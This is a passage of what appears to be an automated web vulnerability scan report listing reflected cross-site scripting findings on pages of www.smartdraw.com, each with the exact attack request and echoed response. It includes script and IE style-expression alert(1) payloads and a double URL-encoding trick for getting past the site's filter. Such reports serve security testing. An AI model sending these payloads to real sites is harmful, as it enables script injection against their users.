Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=pvqz3e55knqwjb55fkolzlq3; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11110
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/product/reviews/index.htm?dadb8"><script>alert(1)</script>9e1a39efb8f=1" rel="nofollow" target="_blank">
...[SNIP]...

3.159. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2401f"><script>alert(1)</script>0614465aa10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?2401f"><script>alert(1)</script>0614465aa10=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:20 GMT
Content-Length: 11110
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4os3yc45lngvyibnt1hyfy45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/product/reviews/index.htm?2401f"><script>alert(1)</script>0614465aa10=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.160. http://www.smartdraw.com/product/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1 was submitted in the REST URL parameter 1. This input was echoed as c202c"style="x:expression(alert(1))"1983cde1eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /productc202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:44 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yytjsqjo2ynqqa55mlvyit45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/productc202c"style="x:expression(alert(1))"1983cde1eb1/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.161. http://www.smartdraw.com/product/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0 was submitted in the REST URL parameter 1. This input was echoed as a6214"style="x:expression(alert(1))"a8713ae88e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=g5orivnknoeu3mnalqm5ky2h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/a6214"style="x:expression(alert(1))"a8713ae88e0/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.162. http://www.smartdraw.com/product/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a was submitted in the REST URL parameter 2. This input was echoed as 9a64e"style="x:expression(alert(1))"79d9addfb9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4ccossevexhpky454jv13azr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/9a64e"style="x:expression(alert(1))"79d9addfb9a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.163. http://www.smartdraw.com/product/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e was submitted in the REST URL parameter 2. This input was echoed as e7026"style="x:expression(alert(1))"d34dba31b1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/x22e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:53 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5ppvdnq4c02bbb55spc4py55; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22e7026"style="x:expression(alert(1))"d34dba31b1e/" rel="nofollow" target="_blank">
...[SNIP]...

3.164. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 146c3"style="x:expression(alert(1))"5d5d2fc8c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/x22?146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=uaszcl55vdwks2faid1tcq45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22/?146c3"style="x:expression(alert(1))"5d5d2fc8c51=1" rel="nofollow" target="_blank">
...[SNIP]...

3.165. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbd65"style="x:expression(alert(1))"a43b560b887 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/x22?fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k3dxer55b03zcg45gc2kh5b5; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22/?fbd65"style="x:expression(alert(1))"a43b560b887=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.166. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1 was submitted in the REST URL parameter 2. This input was echoed as 80d8a"style="x:expression(alert(1))"b9c460ef3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8774
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gvwmqnneobzhy02artx2kqbp; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/80d8a"style="x:expression(alert(1))"b9c460ef3f1/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.167. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f was submitted in the REST URL parameter 2. This input was echoed as a1cdd"style="x:expression(alert(1))"48d79440d3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b00pwu55pf2clt55u0k5o0rq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/a1cdd"style="x:expression(alert(1))"48d79440d3f/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.168. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d74b"><script>alert(1)</script>7dda0913f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/diagram.asp/x22?8d74b"><script>alert(1)</script>7dda0913f6b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 03 Feb 2011 20:29:21 GMT
Content-Length: 12908
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=dia; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wpmm4p551c2dea45k15ywp45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=99C7B3EB-F63C-4257-8835-C875E636C1F0; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: SDLINKID=9184; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/diagram.asp/x22/?8d74b"><script>alert(1)</script>7dda0913f6b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.169. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f932a"><script>alert(1)</script>9f207111f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/diagram.asp/x22?f932a"><script>alert(1)</script>9f207111f3=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=dia; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4dwhidrvpjbkw1msj4gobert; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=6103C386-4733-4A43-95B7-51E67A55D6CD; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: SDLINKID=9184; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12901
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/diagram.asp/x22/?f932a"><script>alert(1)</script>9f207111f3=1" rel="nofollow" target="_blank">
...[SNIP]...

3.170. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32 was submitted in the REST URL parameter 2. This input was echoed as fb652"style="x:expression(alert(1))"3dd903a5e32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32/x22 HTTP